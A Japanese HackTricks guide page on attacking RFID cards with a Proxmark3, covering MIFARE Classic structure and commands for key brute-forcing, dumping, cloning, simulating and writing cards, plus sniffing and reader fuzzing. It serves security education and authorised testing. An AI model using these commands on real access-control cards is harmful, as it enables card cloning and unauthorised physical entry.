7.4 KiB
Proxmark 3
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
Proxmark3を使用したRFIDシステムの攻撃
最初に必要なのは、Proxmark3を入手し、ソフトウェアとその依存関係をインストールすることです。
MIFARE Classic 1KBの攻撃
MIFARE Classic 1KBには16のセクターがあり、それぞれには4つのブロックがあり、各ブロックには16Bが含まれています。UIDはセクター0ブロック0にあり(変更できません)。 各セクターにアクセスするには、2つのキー(AとB)が必要で、それらは各セクターのブロック3に保存されます(セクタートレーラー)。セクタートレーラーには、2つのキーを使用して各ブロックの読み取りと書き込みの権限を与えるアクセスビットも保存されます。 たとえば、最初のキーを知っている場合は読み取りの権限を与え、2番目のキーを知っている場合は書き込みの権限を与えるため、2つのキーは便利です。
さまざまな攻撃が実行できます。
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
Proxmark3を使用すると、タグとリーダーの通信を傍受して、機密データを見つけることができます。このカードでは、暗号操作が弱いため、通信を傍受して使用されるキーを計算することができます(mfkey64
ツールを使用)。
生のコマンド
IoTシステムでは、非商標または非商用のタグが使用されることがあります。この場合、Proxmark3を使用してカスタムの生のコマンドをタグに送信することができます。
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
この情報を使って、カードに関する情報や通信方法について調べることができます。Proxmark3では、次のような生のコマンドを送信することができます:hf 14a raw -p -b 7 26
スクリプト
Proxmark3ソフトウェアには、簡単なタスクを実行するために使用できる自動化スクリプトの事前にロードされたリストが付属しています。完全なリストを取得するには、script list
コマンドを使用します。次に、スクリプトの名前に続いてscript run
コマンドを使用します:
proxmark3> script run mfkeys
タグリーダーをファズするためのスクリプトを作成することができます。有効なカードのデータをコピーして、Luaスクリプトを作成し、1つまたは複数のランダムなバイトをランダム化し、リーダーがどのイテレーションでもクラッシュするかをチェックします。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたいですか、またはHackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはテレグラムグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
- ハッキングのトリックを共有するには、PRを hacktricks repo および hacktricks-cloud repo に提出してください。